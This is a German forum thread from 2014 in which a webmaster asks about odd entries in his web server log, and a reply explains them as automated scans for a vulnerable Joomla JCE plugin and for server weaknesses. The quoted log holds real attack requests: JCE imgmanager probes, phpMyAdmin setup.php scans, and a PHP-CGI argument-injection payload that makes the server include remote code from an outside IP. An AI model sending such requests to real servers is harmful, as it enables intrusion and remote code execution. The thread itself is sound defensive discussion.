Immer mehr Zugriffe, die wohl php-Luecken suchen?

04/02/2014 - 19:37 von Juergen | Report spam
Hallo,

in letzter Zeit mehren sich komische Zugriffe, die auf meiner Webseite
zwar nix anrichten, aber die ich im Groben verstehen "möchte", also den
Hintergrund des Aufrufes (hacken, aussspàhen...) ;-)

Beispiel
2.112.14.58 ... "GET
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version76&cid
HTTP/1.1" "Googlebot (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)" "-"

Der Zugriff bekam "403", soweit ok, Rest vom Logeintrag weggelassen.

Im Internet hab ich zu diesem "imgmanager" nicht sonderlich viel (für
mich) "Verstàndliches" gefunden, aber "task=plugin" làsst nichts Gutes
ahnen. Bin ich hier richtig? Was soll das bedeuten / würde das bewirken?

Was bedeutet es, wenn auf einer deutschen Webseite sowas bei Google
angezeigt wird?
| http://irgend-ne-seitede/startseite...ask/plugin
| /plugin/imgmanager/version/1576/cid/20.html
Ist das "normal" oder ist bei denen was "passiert"?

Gesucht hatte ich nach
| option=com_jce task=plugin plugin=imgmanager
wie geschrieben. Vielleicht ist das auch "nur" ein Trick von Google
selber, um mehr Treffer anzuzeigen? Beim Klick auf einen Treffer _würde_
ausserdem zunàchst eine Google-Seite aufgerufen, erst von dort auf die
Zielseite ;-) (macht Google seit einiger Zeit...)

Dass bei Zugriffen als (Fake) Agentname Googlebot mitgeschickt wird,
kommt ja hàufiger vor, ist das oben wirklich Google via .it?

Ansonsten ist "gern" auch dabei, vorwiegend Ostblock, Indien und China
| "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" mit gleichen Referrer!
| "GET /myadmin/scripts/setup.php HTTP/1.1"
| "GET /pma/scripts/setup.php HTTP/1.1"
oder auch

| "GET
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt
HTTP/1.1"

Was würde das gemacht haben? Da sollte was über US laufen bzw. von dort
included werden?
Danach noch Get /mail/.. Get / webmail/.. usw reichlich probiert ;-)

Jürgen
 

Lesen sie die antworten

#1 Norbert Gebert
14/02/2014 - 23:03 | Warnen spam

Hallo,

in letzter Zeit mehren sich komische Zugriffe, die auf meiner
Webseite zwar nix anrichten, aber die ich im Groben verstehen
"möchte", also den Hintergrund des Aufrufes (hacken,
aussspàhen...) ;-)

Beispiel
2.112.14.58 ... "GET
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version76&cid
HTTP/1.1" "Googlebot (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)" "-"

Der Zugriff bekam "403", soweit ok, Rest vom Logeintrag weggelassen.



Naja, ein automatisiertes Script sucht nach einer JCE-Version die
eine Sicherheitslücke aufweist. Kommen bei uns so ca 40-50 mal am
Tag "vorbei". Btrifft nur Joomla-Installationen.
Ziel ist hier Schadcode einzufügen.


Im Internet hab ich zu diesem "imgmanager" nicht sonderlich viel
(für mich) "Verstàndliches" gefunden, aber "task=plugin" làsst
nichts Gutes ahnen. Bin ich hier richtig? Was soll das bedeuten /
würde das bewirken?

Was bedeutet es, wenn auf einer deutschen Webseite sowas bei
Google angezeigt wird?
| http://irgend-ne-seitede/startseite...ask/plugin
| /plugin/imgmanager/version/1576/cid/20.html
Ist das "normal" oder ist bei denen was "passiert"?



Es wurde mittels robots.txt nicht verboten diese Verzeichnisse zu
durchsuchen. Also listet Google die gefundenen Inhalte.


Gesucht hatte ich nach
| option=com_jce task=plugin plugin=imgmanager
wie geschrieben. Vielleicht ist das auch "nur" ein Trick von
Google selber, um mehr Treffer anzuzeigen? Beim Klick auf einen
Treffer _würde_ ausserdem zunàchst eine Google-Seite aufgerufen,
erst von dort auf die Zielseite ;-) (macht Google seit einiger
Zeit...)

Dass bei Zugriffen als (Fake) Agentname Googlebot mitgeschickt
wird, kommt ja hàufiger vor, ist das oben wirklich Google via .it?




Nö, muss nicht.

Ansonsten ist "gern" auch dabei, vorwiegend Ostblock, Indien und
China
| "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" mit gleichen
Referrer!
| "GET /myadmin/scripts/setup.php HTTP/1.1"
| "GET /pma/scripts/setup.php HTTP/1.1"
oder auch

| "GET
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt
HTTP/1.1"

Was würde das gemacht haben? Da sollte was über US laufen bzw.
von dort included werden?
Danach noch Get /mail/.. Get / webmail/.. usw reichlich
probiert ;-)



Da werden Server-Schwachstellen gesucht. Darauf hast du keinen
direkten Einfluss - Es sei den du bist sysadmin eines solchen.
Was die machen wollen kannst du dir hoffentlich denken.


Jürgen



Allerdings dürftest du in einer PHP-Newsgroup mit diesen Fragen
falsch sein!
MfG
Norbert


Diese E-Mail ist frei von Viren und Malware, denn der avast! Antivirus Schutz ist aktiv.
http://www.avast.com

Ähnliche fragen